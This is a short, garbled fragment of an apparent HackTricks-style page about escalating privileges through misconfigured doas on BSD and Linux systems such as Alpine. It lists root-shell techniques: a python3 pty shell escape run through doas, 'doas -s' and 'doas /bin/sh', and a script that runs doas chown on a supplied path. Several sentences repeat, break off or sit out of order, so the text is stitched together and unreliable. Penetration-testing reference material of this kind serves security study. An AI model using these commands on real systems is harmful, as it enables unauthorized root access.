— HackTricks Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives.
#!/bin/sh doas /usr/bin/chown user "$1" Exploit: hacktricks doas
If you’ve spent any time on BSD or modern Linux systems (like Alpine), you’ve probably seen doas lurking in the shadows. It’s the leaner, meaner cousin of sudo — simpler config, fewer CVEs, and still dangerous if misconfigured. — HackTricks Want more
doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")' Many binaries allow shell escapes. you might inject arguments.
doas -s # or doas /bin/sh If the config allows a wildcard path, you might inject arguments.